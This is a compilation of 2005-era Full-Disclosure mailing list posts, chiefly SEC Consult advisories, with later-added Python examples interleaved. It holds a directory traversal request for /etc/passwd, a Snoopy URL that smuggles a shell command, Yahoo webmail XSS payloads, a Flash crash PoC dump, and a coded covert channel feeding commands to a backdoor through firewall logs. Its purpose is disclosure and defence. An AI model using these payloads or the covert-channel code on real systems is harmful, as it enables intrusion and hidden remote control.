http://66.218.69.11/search/cache?ei=UTF-8&p=n3td3v&fr=sfp&u=mtf.news.yahoo.com/mailto%3Furl%3Dhttp%253A//e.my.yahoo.com/config/cstore%253F.opt%3Dcontent%2526.node%3D1%2526.sid%3D171771%26title%3DChoose+Content%26prop%3Dmycstore%26locale%3Dus%26h1%3Dymessenger+at+Yahoo%21+Groups%26h2%3Dn3td3v%26h3%3Dhttp%253A//my.yahoo.com&w=n3td3v&d=U5wy1m1aMbOe&icp=1&.intl=us

(your Concept).

Sorry to tell you, but there is no vulnerability involved here (except maybe
a lame XSS, didn't try that though).

--
Bernhard
Re: [Full-disclosure] Phun! Search
Hmm,.. No, I can't figure out how this works. You must have used zero day
exploit code.

n3td3v wrote:
> The document is cached on Yahoo Slurp, you explain that, smart guy ;-)
>
> On 3/23/06, Bernhard Mueller <[EMAIL PROTECTED]> wrote:
>> Hello,
>>
>> There's no need at all to cache anything at all.
>>
>> Sorry to tell you, but there is no vulnerability involved here
>>
>> --
>> Bernhard
Re: [Full-disclosure] Question for the Windows pros
Hello,

The ImpersonateClient API does not require that credentials are embedded into
the program. A call to ImpersonateClient allows a server to impersonate the
client when it receives a local connection, e.g. via a named pipe. It is
mostly used by servers to DROP their privileges to that of the connecting
user if they are running with administrative privileges.

A security issue with ImpersonateClient arises if there's no error checking
on the ImpersonateClient call and the process runs on without realizing that
it is still SYSTEM. Another issue would be an unprivileged client with the
ImpersonateClient privilege, if an attacker manages to make a process with
admin rights connect to that client. This is why normal users do not have
this right by default.

Regards,
Bernhard

Paul Schmehl wrote:
> --On Wednesday, January 18, 2006 17:07:23 -0600 Frank Knobbe
> <[EMAIL PROTECTED]> wrote:
>> On Wed, 2006-01-18 at 16:16 -0600, Paul Schmehl wrote:
>>> This means that the exposure, when granting the privilege, is as follows:
>>>
>>> 1) If you can launch a process on the local machine AND
>>> 2) The process has embedded credentials that are different from the user
>>>    launching the process THEN
>>> 3) The user gains those credentials' privileges ***for the length of that
>>>    process***
>>
>> Yup. So if your user has that right, any spyware the user downloads via
>> IE can use that user right to elevate credentials **for the length of the
>> malware installation**. Does that sound right? And does that sound like
>> something you'd want to happen?
>
> The spyware has to bring the credentials with it. The user doesn't *have*
> the credentials. It *gets* them from the process in question. That's a bit
> different. The user has the right to impersonate within the context of a
> process. The process must already have the credentials to elevate, or the
> user gets nothing (if I'm understanding impersonation correctly.)
>
>> If you give that right, or admin privs, why don't you limit that only to
>> the duration of the software install? It sounded like you were planning
>> on granting that user right and leaving it in place. If you only grant it
>> temporarily, the exposure is not great, imho. (Remember, I've been
>> liberated from Windows for a couple years now ;)
>
> Do you know a way to programmatically grant rights, on the fly, and then
> take them away? I know you can do this with RunAs, but that would require
> having an admin password, in the clear, and readable by Authenticated
> Users. That ain't gonna happen.
>
> As far as granting the privilege goes, *if* we do it, it will only be in
> place long enough to distribute the agents. Then it will be removed. But
> I'm reluctant to even do *that* until I'm certain I fully understand the
> ramifications.
>
> Paul Schmehl ([EMAIL PROTECTED])
> Adjunct Information Security Officer
> University of Texas at Dallas
> AVIEN Founding Member
> http://www.utdallas.edu/ir/security/
[Full-disclosure] SEC Consult SA-XXXXXXXXXXX
I just totally mixed up these numbers. Should be SA-20051202-0 and
SA-20051202-1, in the doubtful case that anyone cares.
Re: [Full-disclosure] Webmin miniserv.pl format string vulnerability
As it says on http://www.dyadsecurity.com/s_advisory.html:

  PUBLISHED ADVISORIES.

  Webmin
    Date Found:     September 23, 2005.
    Public Release: November 29, 2005.
    Application:    webmin miniserv.pl, all known versions
    Details:        Webmin 0001 Advisory

  UPCOMING ADVISORIES.

  Perl
    Description:  Cross platform programming language.
    Affected:     To be announced.
    Release Date: To be announced.

I guess we can expect some kind of code execution thru perl sprintf advisory.

[EMAIL PROTECTED] wrote:
> SUMMARY.
>
> The webmin `miniserv.pl' web server component is vulnerable to a new class
> of exploitable (remote code) perl format string vulnerabilities. During the
> login process it is possible to trigger this (...)
>
> A generic remote code execution exploit method has been developed by a
> third party that is reachable though this hole itself.
Re: [Full-disclosure] Fwd: Forwarding comments to FD
This comment is based on ongoing conversations with Yahoo on w*l security.
Sorry, I'm not entitled to post any details at this time, so please take it
as my personal opinion and trust me that I have good reasons for it. You may
also refer to our advisory from october (http://www.sec-consult.com/212.html).

Regards,
Bernhard

[EMAIL PROTECTED] wrote:
> is your comment based on some personal experience, or just an attempt at
> humor? it is contrary to my experience.
>
> On Sun, Nov 20, 2005 at 12:57:24AM +0100, Bernhard Mueller wrote:
>> n3td3v wr04t3:
>>> I have been a continued provider of raw intelligence to Yahoo...
>>
>> This probably explains why Yahoo has zero clue about security :)
Re: [Full-disclosure] Fwd: Forwarding comments to FD
n3td3v wr04t3:
> I have been a continued provider of raw intelligence to Yahoo...

This probably explains why Yahoo has zero clue about security :)
[Full-disclosure] SEC Consult SA-20051107-0 :: toendaCMS multiple vulnerabilites
SEC-CONSULT Security Advisory 20051107-0
=========================================
title: toendaCMS multiple vulnerabilities
program: toendaCMS
vulnerable version: 0.6.2
homepage: www.toenda.com
found: 2005-10-25
by: Bernhard Mueller / SEC-CONSULT / www.sec-consult.com
=========================================

Vendor description:
---
The toendaCMS Content Management and Weblogging tool gives you a modern,
professional publishing system, based on an SQL and/or XML database.

Vulnerability overview:
---
toendaCMS contains various security flaws. These include:

* theft of CMS usernames and passwords (XML database mode)
* session theft (XML database mode)
* directory traversal / reading of arbitrary files (XML database mode)
* arbitrary file uploads

Vulnerability details:
---
1) Account data is stored within the webroot (XML mode):

   http://tcms.webserver.com/data/tcms_user/random-val.xml

   where random-val is a 5-byte random value in hex notation (e.g.
   2ac336ff0d.xml). Each XML file contains the username (base64) and
   password (MD5) of a single user. This is particularly dangerous if the
   webserver allows directory listing.

2) Session data is stored within the webroot (XML mode):

   http://tcms.webserver.com/engine/admin/user-id.xml

   The session files are created once a user logs in to the CMS, so we just
   have to monitor this directory to steal his session. This is particularly
   dangerous if the webserver allows directory listing.

3) Directory traversal / reading of arbitrary files (XML mode):

   http://tcms.webserver.com/engine/admin/admin.php?id_user=../../../../../../etc/passwd

4) Arbitrary file uploads:

   Once we have gained access to the administrator interface, we can use the
   gallery scripts to upload arbitrary files to:

   http://tcms.webserver.com/data/images/albums/

   No content-type or file validation checks are in place, so this is the
   easiest way to get shell access.

Additional remarks:
---
These flaws were found during a pentest, in an environment with
MAGIC_QUOTES_GPC activated. Please do NOT try to use toendaCMS without
MAGIC_QUOTES and other safeguards, unless you plan to run a honeypot or have
another particular reason for being very vulnerable.

Vendor status:
---
vendor notified: 2005-10-26
vendor response: 2005-10-30
patch available: 2005-11-01

The issues described in this advisory have been addressed in the latest
version of toendaCMS (0.6.2 stable). Download at:
http://www.toenda.com/de/data/files/Software/toendaCMS_Version_0.6.0_Stable/toendaCMS_0.6.2_Stable.zip

General remarks
---
We would like to apologize in advance for potential nonconformities and/or
known issues.

EOF Bernhard Mueller / @2005
bmu at sec-consult dot com
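Findings 3 and 4 above are both missing a server-side check. The following is an added example, not toendaCMS's code, showing the two checks in Python rather than PHP: a path resolver that maps a user-controlled id such as the advisory's "../../../../../../etc/passwd" onto the filesystem and refuses anything that escapes the intended directory, and an upload validator that allow-lists the extension and checks the file signature instead of trusting the client-supplied name or Content-Type. The directory names, the file-signature table and the sample upload bytes are constructed for the example.

```python
"""Added example: path containment and upload validation (not toendaCMS code)."""
import os
import posixpath
import tempfile


class PathTraversal(Exception):
    """Raised when a user-supplied id would resolve outside the base directory."""


def resolve_under_root(root, user_id):
    """Return an absolute path for user_id that is guaranteed to lie inside root.

    The naive version the advisory describes is effectively
    os.path.join(root, user_id), which yields /etc/passwd for a user_id of
    ../../../../../../etc/passwd (and for an absolute "/etc/passwd", since
    join discards root in that case). Here the candidate is canonicalised
    (realpath collapses ".." and follows symlinks) and compared with the
    canonical root via commonpath, so neither ".." segments nor a symlink
    planted inside root can reach outside it.
    """
    if "\x00" in user_id:  # NUL would truncate the name in C-level APIs
        raise PathTraversal(user_id)
    root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root, user_id))
    if os.path.commonpath([root, candidate]) != root:
        raise PathTraversal(user_id)
    return candidate


# Constructed allow-list: extension -> leading bytes ("magic") the content must have.
ALLOWED_IMAGE_TYPES = {
    ".jpg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
}


def validate_upload(filename, data):
    """Return the sanitised file name to store, or None if the upload is refused.

    - any client-supplied directory part is dropped (basename);
    - the extension must be in the allow-list, and the stem may not contain
      a further dot, so "shell.php.jpg" (which Apache's mod_mime may still
      hand to the PHP handler) is refused along with "shell.php";
    - the content must start with the signature matching the extension, so
      PHP source renamed to x.jpg is refused as well.
    """
    base = posixpath.basename(filename)
    stem, ext = posixpath.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED_IMAGE_TYPES or not stem or "." in stem:
        return None
    if not data.startswith(ALLOWED_IMAGE_TYPES[ext]):
        return None
    return stem + ext


def demo():
    """Exercise both checks against a constructed data/tcms_user directory."""
    with tempfile.TemporaryDirectory() as webroot:
        users = os.path.join(webroot, "data", "tcms_user")
        os.makedirs(users)
        open(os.path.join(users, "2ac336ff0d.xml"), "w").close()
        good = os.path.basename(resolve_under_root(users, "2ac336ff0d.xml"))
        blocked = []
        for attempt in ("../../../../../../etc/passwd", "/etc/passwd", "..\x00.xml"):
            try:
                resolve_under_root(users, attempt)
                blocked.append(False)
            except PathTraversal:
                blocked.append(True)
    return good, blocked


if __name__ == "__main__":
    print(demo())
    print(validate_upload("shell.php", b"<?php system($_GET['c']); ?>"))
    print(validate_upload("../../engine/admin/pic.png", b"\x89PNG\r\n\x1a\n" + b"\0" * 16))
```

The traversal check is deliberately done after canonicalisation rather than by rejecting ".." substrings, because encodings and symlinks bypass substring filters while `realpath` plus `commonpath` reasons about where the path actually lands.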
[Full-disclosure] SEC Consult SA-20051107-1 :: Macromedia Flash Player ActionDefineFunction Memory Corruption
SEC-CONSULT Security Advisory 20051107-1
===========================================
title: Macromedia Flash Player ActionDefineFunction Memory Corruption
program: Macromedia Flash Plugin
vulnerable version: flash.ocx v7.0.19.0 and earlier
                    libflashplayer.so before 7.0.25.0
homepage: www.macromedia.com
found: 2005-06-27
by: Bernhard Mueller / SEC-CONSULT / www.sec-consult.com
===========================================

Vendor description:
---
Macromedia Flash Player is the high performance, lightweight, highly
expressive client runtime that delivers powerful and consistent user
experiences across major operating systems, browsers, mobile phones and
devices.

Vulnerability:
---
ActionScript is an ECMAScript-based programming language used for
controlling Macromedia Flash movies and applications. In SWF files,
ActionScript commands are represented by DoAction tags embedded in frames.

SEC Consult has found that parameters to ActionDefineFunction (ACTIONRECORD
0x9b) are not properly sanitized. Loading a specially crafted SWF leads to an
improper memory access condition which can be used to crash Flash Player or
may be exploited as a vector for code execution.

This issue is similar to CAN-2005-2628 (as reported by eEye Digital Security
on November 4, 2005) but affects a different function. Coincidentally,
Macromedia received our notification of this bug on the same day (June 27).

Proof of Concept:
---
Tag dump of a malicious flash movie (tag headers included, SWF file header
omitted):

[SetBackgroundColor] - TagID: 9 (size: 3, short tag)
  \x43\x02\xff\x00\x00

[DoAction] - TagID: 12 (size: 60, short tag)
  \x3c\x03\x9b\x08\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x40\x00
  \x42\x42\x42\x42\x42\x42\x42\x42\x00\x43\x43\x43\x43\x43\x43\x43
  \x43\x00\x44\x44\x44\x44\x44\x44\x44\x44\x00\x45\x45\x45\x45\x45
  \x45\x45\x45\x00\x46\x46\x46\x46\x46\x46\x46\x46\x00\x00

[ShowFrame] - TagID: 1 (size: 0, short tag)
  \x40\x00

[End] - TagID: 0 (size: 0, short tag)
  \x00\x00

Recommended Fix:
---
The issue has been addressed in MPSB05-07. Upgrade to the newest version of
Flash Player 7 or to Flash Player 8. Link:
http://www.macromedia.com/devnet/security/security_zone/mpsb05-07.html

Vendor status:
---
vendor notified: 2005-06
fixed: 2005-09

General remarks
---
We would like to apologize in advance for potential nonconformities and/or
known issues.

EOF Bernhard Mueller / @2005
bmu at sec-consult dot com
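To make visible what is structurally wrong with the DoAction tag in the dump, here is an added example (not SEC Consult's or Macromedia's code) that parses the tag stream and the ActionDefineFunction record using the layouts from the public SWF file format specification: a tag RECORDHEADER is a little-endian u16 whose upper 10 bits are the tag code and lower 6 bits the length, and ActionDefineFunction is action code 0x9b, a u16 record length, a NUL-terminated function name, a u16 parameter count, that many NUL-terminated parameter strings and a u16 code size. The bytes are copied from the advisory. Read that way, the record declares a length of 8 while its name alone needs 9 bytes, and a count of 0x40 (64) parameters while only five strings follow before the ActionEnd byte. How Flash Player's own parser walked this record is not described on the page and is not claimed here; the code only reports the inconsistencies a spec-following reader hits.

```python
"""Added example: parse the advisory's PoC tag dump (SWF spec layouts, not Flash code)."""
import struct

# The four tags from the advisory's dump, byte for byte (no SWF file header).
POC_TAGS = bytes.fromhex(
    "4302 ff0000 "                              # SetBackgroundColor (code 9, len 3)
    "3c03 9b0800 4141414141414141 00 4000 "     # DoAction (code 12, len 60): 0x9b, len 8, name, numParams 0x40
    "4242424242424242 00 4343434343434343 00 "  # parameter strings ...
    "4444444444444444 00 4545454545454545 00 "
    "4646464646464646 00 00 "                   # ... fifth parameter, then ActionEnd (0x00)
    "4000 "                                     # ShowFrame (code 1, len 0)
    "0000 "                                     # End (code 0, len 0)
)

DO_ACTION = 12
ACTION_DEFINE_FUNCTION = 0x9B


def parse_tags(data):
    """Split a SWF tag stream into (tag_code, body) pairs.

    RECORDHEADER: u16 LE, code = value >> 6, length = value & 0x3f;
    a length of 0x3f means a u32 length follows (long tag form).
    """
    tags, pos = [], 0
    while pos + 2 <= len(data):
        (code_and_len,) = struct.unpack_from("<H", data, pos)
        pos += 2
        code, length = code_and_len >> 6, code_and_len & 0x3F
        if length == 0x3F:
            (length,) = struct.unpack_from("<I", data, pos)
            pos += 4
        tags.append((code, data[pos:pos + length]))
        pos += length
        if code == 0:  # End tag closes the stream
            break
    return tags


def read_cstring(buf, pos):
    """Read a NUL-terminated string; raises ValueError if no terminator is left."""
    end = buf.index(b"\x00", pos)
    return buf[pos:end].decode("latin-1"), end + 1


def parse_define_function(body):
    """Parse an ActionDefineFunction record at the start of a DoAction body.

    Walks the parameter list as far as the buffer allows instead of trusting
    num_params, and reports where the declared fields and the real data
    disagree. For a well-formed record the declared length covers
    len(name)+1 + 2 + sum(len(param)+1) + 2 (the trailing u16 code size).
    """
    if body[0] != ACTION_DEFINE_FUNCTION:
        raise ValueError("not an ActionDefineFunction record")
    (declared_len,) = struct.unpack_from("<H", body, 1)
    pos = 3
    name, pos = read_cstring(body, pos)
    (num_params,) = struct.unpack_from("<H", body, pos)
    pos += 2
    params = []
    while len(params) < num_params and pos < len(body):
        try:
            param, pos = read_cstring(body, pos)
        except ValueError:  # ran off the end of the tag body
            break
        params.append(param)  # note: a lone 0x00 (ActionEnd) is swallowed as an empty parameter
    consumed = pos - 3  # bytes actually used by name + count + parameters
    return {
        "name": name,
        "declared_len": declared_len,
        "num_params": num_params,
        "params_found": len(params),
        "params_missing": num_params - len(params),
        "bytes_past_declared_len": max(0, consumed - declared_len),
        "hit_end_of_body": len(params) < num_params,
    }


def analyze(tag_stream=POC_TAGS):
    """Return the tag codes in the stream and the analysis of its DoAction record."""
    tags = parse_tags(tag_stream)
    do_action = next(body for code, body in tags if code == DO_ACTION)
    return [code for code, _ in tags], parse_define_function(do_action)


if __name__ == "__main__":
    codes, record = analyze()
    print("tags:", codes)
    for key, value in record.items():
        print("%-24s %r" % (key, value))
```

The record's declared length (8) is already exceeded by the function name, and a reader that believes the 64-parameter count keeps consuming strings past the end of the 60-byte tag body, which is the kind of out-of-bounds walk the advisory's "improper memory access condition" refers to.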
[Full-disclosure] SEC-Consult SA 20051025-0 :: Snoopy Remote Code Execution Vulnerability
SEC-CONSULT Security Advisory 20051025-0
==========================================
title: Snoopy Remote Code Execution Vulnerability
program: Snoopy PHP Webclient
vulnerable version: 1.2 and earlier
homepage: http://snoopy.sourceforge.net
found: 2005-10-10
by: D. Fabian / SEC-CONSULT / www.sec-consult.com
==========================================

vendor description:
---
Snoopy is a PHP class that simulates a web browser. It automates the task of
retrieving web page content and posting forms, for example. Snoopy is used
by various RSS parsers, which are in turn used in a whole bunch of
applications like weblogs, content management systems, and many more.

vulnerability overview:
---
Whenever an SSL-protected web page is requested with one of the many Snoopy
API calls, it calls the function _httpsrequest which takes the URL as
argument. This function in turn calls the PHP function exec with unchecked
user input. Using a specially crafted URL, an attacker can supply arbitrary
commands that are executed on the web server with the privileges of the web
user. While the vulnerability can not be exploited using the Snoopy class
file itself, there may exist implementations which hand unchecked URLs from
users to Snoopy.

proof of concept:
---
Consider the following code on a webserver:

--- code ---
<?php
include "Snoopy.class.php";
$snoopy = new Snoopy;
$snoopy->fetch($_GET['url']);
echo "<PRE>\n";
print $snoopy->results;
echo "</PRE>\n";
?>
--- /code ---

Requesting this code with a manipulated URL results in execution of
arbitrary commands (in this case echo 'hello' > test.txt). The following
URL is a single line:

http://server/fetch.php?url=https://www.%22;+echo+'hello'+%3E+test.txt

vulnerable versions:
---
It seems that version 1.2 as well as some prior versions are vulnerable to
the attack described above.

recommended fix:
---
Update to Snoopy version 1.2.1.

vendor status:
---
vendor notified: 2005-10-24
vendor response: 2005-10-24
patch available: 2005-10-24

EOF Daniel Fabian / @2005
d.fabian at sec-consult dot com
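The shape of the bug, as an added example in Python (not Snoopy's code): the advisory says the URL reaches exec() unchecked, but the exact curl command line Snoopy built is not on the page, so the command template below is an assumption. The point does not depend on it. A URL interpolated into a shell command string can close the quoted argument with a `"` and append its own commands, which is exactly what the advisory's payload does; a URL that is validated and then passed as one argv element to a process spawned without a shell cannot. The payload is decoded from the advisory's PoC URL; everything else is constructed.

```python
"""Added example: shell command injection via a URL, vulnerable vs. hardened (not Snoopy code)."""
import re
from urllib.parse import unquote_plus, urlsplit

# The advisory's payload, decoded from the query string of its PoC URL.
PAYLOAD = unquote_plus("https://www.%22;+echo+'hello'+%3E+test.txt")
# -> https://www."; echo 'hello' > test.txt

# RFC 1123-style host name: labels of letters/digits/hyphens joined by dots.
HOSTNAME_RE = re.compile(
    r"^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def vulnerable_command(url):
    """String a PHP exec("curl ... \"$url\"") hands to /bin/sh (assumed template).

    The closing quote is the important part: a '"' inside the URL ends the
    quoted argument early and everything after it is parsed as shell syntax.
    """
    return 'curl -k -s "%s"' % url


def injected_shell_text(url):
    """Return whatever of the URL escapes the quoted argument, or '' if nothing does."""
    pieces = vulnerable_command(url).split('"')
    return pieces[2].strip() if len(pieces) > 3 else ""


def validated_argv(url):
    """Hardened variant: validate the URL, then return an argv list for
    subprocess.run(argv) with no shell involved.

    Raises ValueError on anything that is not a plain http(s) URL with a
    syntactically valid host. Even if the validation were skipped, argv keeps
    the whole URL a single argument, so ';' and '>' never reach a shell.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError("scheme not allowed: %r" % parts.scheme)
    if parts.username or parts.password:
        raise ValueError("userinfo not allowed")
    host = parts.hostname or ""
    if not HOSTNAME_RE.match(host):
        raise ValueError("bad host: %r" % host)
    return ["curl", "-k", "-s", url]


def rejects(url):
    """True if the hardened path refuses the URL."""
    try:
        validated_argv(url)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    print(vulnerable_command(PAYLOAD))
    print("injected:", injected_shell_text(PAYLOAD))
    print("hardened rejects payload:", rejects(PAYLOAD))
    print(validated_argv("https://snoopy.sourceforge.net/index.php?q=1"))
```

Snoopy's actual fix in 1.2.1 is not shown on the page; escaping the string for the shell would also close this particular hole, but passing the URL as an argument without a shell removes the class of bug rather than one instance of it.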
[Full-disclosure] SEC-CONSULT-SA-20051021-0: Yahoo/MSIE XSS
SEC-CONSULT Security Advisory 20051021-0
===========================================
title: Yahoo/MSIE XSS
program: Yahoo Webmail in combination with MSIE 6.0 (maybe other browsers)
homepage: www.yahoo.com
found: 2005-04
by: SEC-Team / SEC-CONSULT / www.sec-consult.com
===========================================

Vulnerability overview:
---
Since April 2005 SEC-Consult has found 5+ serious vulnerabilities within
Yahoo's webmail systems. All of them have been fixed in the production
environment. Nevertheless SEC-Consult believes that input validation through
blacklists can only be a temporary solution to problems like this. From our
point of view there are many other applications vulnerable to this special
type of problem, where vulnerabilities of clients and servers can be
combined.

Vulnerability details:
---
1) XSS / Cookie theft

Yahoo's blacklists fail to detect script tags in combination with special
characters like NULL bytes and other meta-characters. This leaves webmail
users using MSIE vulnerable to typical XSS / relogin-trojan / phishing
attacks.

2) Some XSS examples from our advisories

Excerpts from HTML mails ([META-Char] marks the position of the inserted
meta-character):

SCRIPT tag:
---cut here---
<h1>hello</h1><s[META-Char]cript>alert("i have you now")</s[META-Char]cript><br>rrx<br>
---cut here---

OBJECT tag:
---cut here---
<objec[META-Char]t classid="CLSID:D27CDB6E-AE6D-11cf-96B8-44455354"><param name="movie" value="http://[somewhere]/yahoo.swf"></obje[META-Char]ct>
---cut here---

ONERROR attribute:
---cut here---
<img src="http://dontexist.info/x.jpg" one[META-Char]rror="alert('i have you now')">uargg</p>
---cut here---

ONUNLOAD attribute:
---cut here---
</body><body onun[META-Char]load="alert('i have you now')"><br/><br><p>somewords</p></body></html>
---cut here---

Recommended hotfix for webmail users
---
Do not use MS Internet Explorer.

Recommended fixes
---
Do not use blacklists on tags and attributes. Whitelist special/meta
characters.

Vendor status:
---
Vulnerabilities have been fixed.

General remarks
---
We would like to apologize in advance for potential nonconformities and/or
known issues.

~
SEC-Team / www.sec-consult.com /
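Why the blacklist fails and what the recommended whitelist does differently, as an added example (not Yahoo's filter, which is not on the page): the blacklist below is a constructed stand-in for a tag/attribute blacklist, the meta-character is a NUL byte (one of the characters the advisory names), and `ie_view()` is an assumed model of the lenient client the advisory relies on, a browser that drops embedded NULs while tokenising so that `s<NUL>cript` is parsed as `script`. The payloads are the advisory's, with NUL substituted for [META-Char].

```python
"""Added example: blacklist bypass with an embedded NUL, canonical check and whitelist (constructed)."""
import re
from html import escape

# Constructed stand-in for a tag/attribute blacklist of the kind the advisory criticises.
BLACKLIST = re.compile(r"<\s*/?\s*(script|object|embed)\b|on\w+\s*=", re.I)

# The advisory's payloads with a NUL byte as the meta-character.
PAYLOADS = [
    '<h1>hello</h1><s\x00cript>alert("i have you now")</s\x00cript>',
    '<img src="http://dontexist.info/x.jpg" one\x00rror="alert(\'i have you now\')">',
    '</body><body onun\x00load="alert(\'i have you now\')">',
]


def naive_filter_blocks(markup):
    """Blacklist applied to the raw bytes, as received from the sender."""
    return BLACKLIST.search(markup) is not None


def ie_view(markup):
    """Assumed model of the lenient client: embedded NULs are ignored, so the
    tokeniser sees <script> where the filter saw <s\\x00cript>."""
    return markup.replace("\x00", "")


def canonical_filter_blocks(markup):
    """Same blacklist, but applied to the form the browser will actually parse.

    This closes the NUL trick, yet it is still a blacklist: every other
    client quirk (other meta-characters, encodings) needs its own
    canonicalisation step, which is the advisory's argument for whitelisting.
    """
    return BLACKLIST.search(ie_view(markup)) is not None


ALLOWED_TAGS = {"b", "i", "p", "br", "h1"}  # constructed allow-list
TAG_RE = re.compile(r"<\s*(/?)\s*([A-Za-z0-9]+)([^>]*)>")


def allowlist_clean(markup):
    """Whitelist approach: keep only ALLOWED_TAGS, strip every attribute from
    them, drop all other tags and HTML-escape the remaining text."""
    markup = ie_view(markup)  # always work on the canonical form
    out, pos = [], 0
    for m in TAG_RE.finditer(markup):
        out.append(escape(markup[pos:m.start()]))
        slash, name = m.group(1), m.group(2).lower()
        if name in ALLOWED_TAGS:
            out.append("<%s%s>" % (slash, name))
        pos = m.end()
    out.append(escape(markup[pos:]))
    return "".join(out)


def evaluate(payloads=PAYLOADS):
    """For each payload: (naive blacklist blocks?, canonical blacklist blocks?)."""
    return [(naive_filter_blocks(p), canonical_filter_blocks(p)) for p in payloads]


if __name__ == "__main__":
    for p, verdict in zip(PAYLOADS, evaluate()):
        print(repr(p), "->", verdict)
        print("   whitelisted:", allowlist_clean(p))
```

Both defences operate on `ie_view()` output; the difference is that the whitelist needs no knowledge of which tags or attributes are dangerous, only of the handful it wants to keep.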
Re: [Full-disclosure] Interesting idea for a covert channel or I just didn't research enough?
if you have system access, why not capture packets at kernel level, BEFORE
they reach the firewall. your approach seems to be very noisy ;)

PASTOR ADRIAN wrote:
> Sometime ago I thought of the following idea for a covert channel.
> Although the idea of covert channels is *not* new at all, I couldn't find
> anything in Google related to the following method of implementing a
> covert channel.
>
> The scenario is the following. The victim is a host with a host-level
> firewall which is blocking *all* incoming traffic. Somehow the attacker
> still needs to communicate with a backdoor planted in this host. Use a
> reverse shell and job done, you might say. Actually, there is another way
> which I thought would be more creative (IMHO).
>
> It works like this: the backdoor enables logging in the host-level
> firewall for all dropped packets, say Windows XP SP2 Firewall. Then the
> backdoor receives commands from the attacker by interpreting the
> properties of the dropped packets which were logged by the firewall. In
> other words, the backdoor is constantly reading the logs and parsing
> commands which were sent by the attacker embedded in packets which are
> being dropped (but logged) by the firewall.
>
> attacker sends packets -> packets are dropped by firewall -> packets'
> properties are captured in logs -> backdoor reads logs and finds encoded
> commands -> commands are executed
>
> Now, for the way the backdoor would reply back to the victim is really up
> to you. One method that comes to my mind is by posting the responses to a
> PHP script which is located in some free-hosting webpage. The attacker
> would then access this webpage.
>
> Please, if you know anything related to backdoors intercepting commands
> from log files send me some links.
>
> Ideas, comments and flames are more than welcome :-) .
>
> Regards,
> pagvac (Adrian Pastor)
>
> Earth, SOLAR SYSTEM
> www.adrianpv.com
> www.ikwt.com (In Knowledge We Trust)
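The channel described in the quoted post, built end to end as an added example (not Adrian Pastor's code): the attacker encodes a command into the destination ports of packets it knows will be dropped, and the implant reads the firewall's drop log and decodes them. No packets are sent here; the attacker side only produces the port sequence to probe, and the victim side parses text. The log lines are constructed in the W3C layout of the Windows XP SP2 firewall log (pfirewall.log); the port numbering scheme, the marker ports, the addresses and the sample command are all choices made for the example.

```python
"""Added example: command covert channel through host-firewall drop logs (constructed)."""
import re

BASE_PORT = 40000            # command byte b travels as dst-port = BASE_PORT + b
START, STOP = 49999, 49998   # marker ports framing one command
ATTACKER_IP = "198.51.100.7"


def encode_command(cmd):
    """Attacker side: the ordered list of destination ports to hit."""
    return [START] + [BASE_PORT + b for b in cmd.encode("ascii")] + [STOP]


# Leading fields of a pfirewall.log line: date time action protocol src-ip dst-ip src-port dst-port ...
LOG_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<action>\S+) (?P<proto>\S+) "
    r"(?P<src>\S+) (?P<dst>\S+) (?P<sport>\d+|-) (?P<dport>\d+|-)"
)


def decode_from_log(lines, attacker_ip=ATTACKER_IP):
    """Implant side: walk the drop log once and return every framed command.

    Only DROP entries from the expected source count; anything outside the
    byte range between a START and a STOP marker is ignored as noise, and a
    new START discards a half-received command.
    """
    commands, current = [], None
    for line in lines:
        if line.startswith("#"):  # W3C header lines (#Version, #Fields, ...)
            continue
        m = LOG_RE.match(line)
        if not m or m.group("action") != "DROP" or m.group("src") != attacker_ip:
            continue
        if m.group("dport") == "-":  # ICMP and friends carry no port
            continue
        port = int(m.group("dport"))
        if port == START:
            current = bytearray()
        elif port == STOP and current is not None:
            commands.append(current.decode("ascii"))
            current = None
        elif current is not None and BASE_PORT <= port < BASE_PORT + 256:
            current.append(port - BASE_PORT)
    return commands


def make_log(ports, attacker_ip=ATTACKER_IP, victim_ip="192.0.2.10"):
    """Constructed pfirewall.log content for one probe sequence, with unrelated
    dropped traffic interleaved to show that the decoder filters it out."""
    header = [
        "#Version: 1.5",
        "#Software: Microsoft Windows Firewall",
        "#Fields: date time action protocol src-ip dst-ip src-port dst-port size "
        "tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path",
    ]
    rows = []
    for i, port in enumerate(ports):
        rows.append("2005-10-20 10:15:%02d DROP TCP %s %s 51000 %d 48 S 12345 0 65535 - - - RECEIVE"
                    % (i % 60, attacker_ip, victim_ip, port))
        if i == 2:  # noise: another host's SSDP, and the attacker probing port 80
            rows.append("2005-10-20 10:15:02 DROP UDP 203.0.113.9 %s 1900 1900 0 - - - - - - - RECEIVE" % victim_ip)
            rows.append("2005-10-20 10:15:02 DROP TCP %s %s 51001 80 48 S 12345 0 65535 - - - RECEIVE"
                        % (attacker_ip, victim_ip))
    return header + rows


if __name__ == "__main__":
    probe = encode_command("dir c:\\")
    print("ports to probe:", probe)
    print("decoded:", decode_from_log(make_log(probe)))
```

As Bernhard's reply notes, each command byte costs one logged connection attempt from the same source, so the channel is slow and leaves a conspicuous trail in exactly the log an administrator is likely to read.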
Re: [Full-disclosure] CORE-Impact license bypass
[EMAIL PROTECTED] wrote:
> On Tue, 27 Sep 2005 17:53:58 +0200, Bernhard Mueller said:
>
> And note also that finding a hole and being talented enough to create an
> exploit are *totally* distinct. I found a rather nasty rootable hole in
> Sendmail a while back (read the release notes for 8.10.1 and the relevant
> manpages for the system linker - that gives enough info to figure out what
> the bug was). Never did create a working exploit for it - I fooled with it
> for an afternoon and only got as far as proving that if somebody were to
> spend more than an afternoon on it, they *could* produce a working exploit.

i agree with this. it's often much easier to find a bug than to exploit it
(see strange heap overflows and the like), and i also don't have the time to
spend days on disassembling and looking for attack vectors (and i'm sure that
other people will have more fun doing just that).

what i criticize is that *lots* of companies (at least here in my vicinity)
are selling cheap vulnerability assessments which actually are nothing more
than automated security scans. this leads to the customer feeling safe when
he's really wide open to attacks. often, these people's networks can be
rooted in no time. sure, you don't have to be uber-31337 to do penetration
